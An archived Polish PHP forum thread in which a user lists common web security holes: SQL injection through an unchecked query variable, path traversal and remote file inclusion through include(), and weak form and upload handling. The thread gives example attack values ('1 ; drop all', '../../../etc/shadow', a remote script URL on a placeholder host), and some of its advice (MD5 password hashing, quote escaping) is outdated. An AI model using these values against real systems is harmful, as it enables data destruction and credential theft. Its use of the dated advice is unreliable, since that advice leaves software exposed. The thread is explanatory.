archiwum forum cream.software

[DEXTER:)]

[januzi]

[DEXTER:)]

[januzi]

4) 5) jak masz cos dzialajce na bazie, np. pobierasz tekst o numerze pobranym z adresu "select * from tabela where numer = $numer" ;
zgadnij co sie stanie, jesli zamiast liczby pojawi sie tam tekst jakis ? np "1 ; drop all" ? tam gdzie sie da nalezy (int)$zmienna, a tam gdzie nie, to trzeba przypilnowac zeby nie pojawily sie wpisy umozliwiajace dowolna operacje na bazie (dodawanie \ przed " i ' jest dosc skuteczne, zeby sie zabezpieczyc)

3) include ( $zmienna ) ; $zmienna = "../../../etc/passwd" ; $zmienna = "../../../etc/shadow" ; $zmienna = "http://bandzior/skrypt_na_serwerze_bez_php.php" ;

2) md5(), logowanie sie zachowywane tez w md5() np. jako zlozenie hasla+nick+costam

1) kontrola odbieranych plikow przed przeniesieniem do katalogu, kontrola obslugi formularza, tak aby nie mozna bylo go wywolac bezposrednio, kontrola wyslanych danych pod katem tego skad przyszly
teksty mozna znalezc na php.pl, kess.snug.pl ...

[kalu111]

co to znaczy : " kontrola obslugi formularza, tak aby nie mozna bylo go wywolac bezposrednio(..)"

[januzi]

[kalu111]

[januzi]

[kalu111]